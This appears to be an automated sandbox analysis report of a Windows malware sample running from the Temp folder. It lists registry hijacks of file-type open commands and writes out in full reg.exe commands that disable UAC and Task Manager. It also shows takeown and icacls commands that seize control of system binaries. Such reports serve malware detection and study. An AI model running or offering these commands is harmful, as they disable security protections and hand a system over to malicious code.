Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\mode.com C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5108 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 4912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\reg.exe
PID 5108 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3268 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1672 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3448 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 232 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 912 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3108 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3492 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4916 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1992 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4112 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3380 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\takeown.exe
PID 5108 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe
PID 5108 wrote to memory of 2016 N/A C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe C:\Windows\System32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe

"C:\Users\Admin\AppData\Local\Temp\adc8361c120f88c1dd36f0069eefde0397a5f6d115a25f36beeac2da45826b77N.exe"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\bfsvc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\HelpPane.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\hh.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\splwow64.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\winhlp32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\write.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\msra.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\runas.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"

C:\Windows\System32\icacls.exe

"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)

C:\Windows\System32\takeown.exe

"C:\Windows\System32\takeown.exe" /S YLFOGIOE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"

C:\Windows\System32\icacls.exe

